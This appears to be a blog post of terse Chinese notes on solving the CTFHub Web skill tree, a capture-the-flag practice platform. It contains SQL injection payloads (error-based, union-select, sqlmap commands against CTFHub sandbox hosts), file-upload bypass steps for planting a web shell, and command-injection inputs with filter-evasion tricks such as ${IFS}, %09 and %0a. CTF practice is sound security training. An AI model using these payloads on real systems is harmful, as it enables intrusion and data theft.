【CTFHUB】Web技能树

Web

HTTP协议

请求方式

 

302跳转

 

cookie

 

基础认证

 

响应包源代码

 

信息泄露

目录遍历

 

phpinfo

 

备份文件下载

网站源码

 

bak文件

 

vim缓存

下载下来放到linux中
在文件前面加的点(.)   .index.php.swp
然后运行 vi -r index.php
 

.DS_Store

记事本打开
 

Git泄露

Log

 

Stash

同上
 

Index

同上
 

SVN泄露

使用dvcs-ripper工具
 

HG泄露

使用dvcs-ripper工具
 
 

密码口令

弱口令

admin 123456
 

默认口令

百度搜索亿邮邮件网关默认口令
 
 
 

SQL注入

整数型注入

 

字符型注入

 

报错注入

extractvalue函数报错:       1 and ( extractvalue( 'anything',concat( '~', (select database()) ) ) );
updatexml函数报错:          1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)
只能显示32位:
substr(字符串,开始位置,长度)
 

布尔盲注

sqlmap
 
数据库 sqli   表 flag   字段 flag
 

时间盲注

sqlmap
 
MySQL结构
-1 union select 1, group_concat(djbtjjrnuq) from sqli.pqfzaflkkt;
 
cookie注入
sqlmap -u " http://challenge-52d3494f9e4a406f.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 --dbs 
 
UA注入
user-agent:   -1 union select 1,group_concat(hddxcgzzsv) from sqli.bgerzmdwpi;#
sqlmap: 
sqlmap -u "http://challenge-f7a6b5d5665981cc.sandbox.ctfhub.com:10080/" --user-agent "123" --level 3 --dbs -technique U --dbms
 
Refer注入
同上,只不过在referer中输入SQL语句
 

XSS

反射型

 

文件上传

无验证

前端验证

把PHP文件后缀改为jpg,抓包再改回php

.htaccess

上传.htaccess和hhh.jpg
 
MIME绕过
正常上传,抓包,将content-type改为 image/jpeg

00截断

双写后缀

文件头检测

将一句话马改为jpg后缀,抓包,修改后缀为php,并添加gif头
 

RCE

命令注入

127.0.0.1 & ls
 
过滤cat
127.0.0.1 & more flag_162822816029866.php
 

过滤空格

使用${IFS}代替空格(可以代替空格的有IFS$9、%09、%0a、<、>、<>、{,}、${IFS}等)
 
过滤目录分隔符
使用;符号分割命令
127.0.0.1 & ls
发现flag_is_here目录
127.0.0.1 & cd flag_is_here;ls
发现flag_44052408916433.php文件
127.0.0.1& cd flag_is_here;ls;cat flag_44052408916433.php
查看源代码得到flag
 

过滤运算符

127.0.0.1 ; cat flag_991932693945.php
 

综合过滤练习

过滤了|,&,;, ,/,cat,flag,ctfhub
%0a(换行符)可以代替;符号,但是要在url处输入,不然会被再次转义
%09或者${IFS}等,可以替代空格
通配符 *   ?
 
127.0.0.1%09%0a%09cd%09fla?_is_here%0amore%09fla?_260832613315632.php#
 
 
 
posted @ 2020-05-29 23:13  yokan  阅读(577)  评论(0编辑  收藏  举报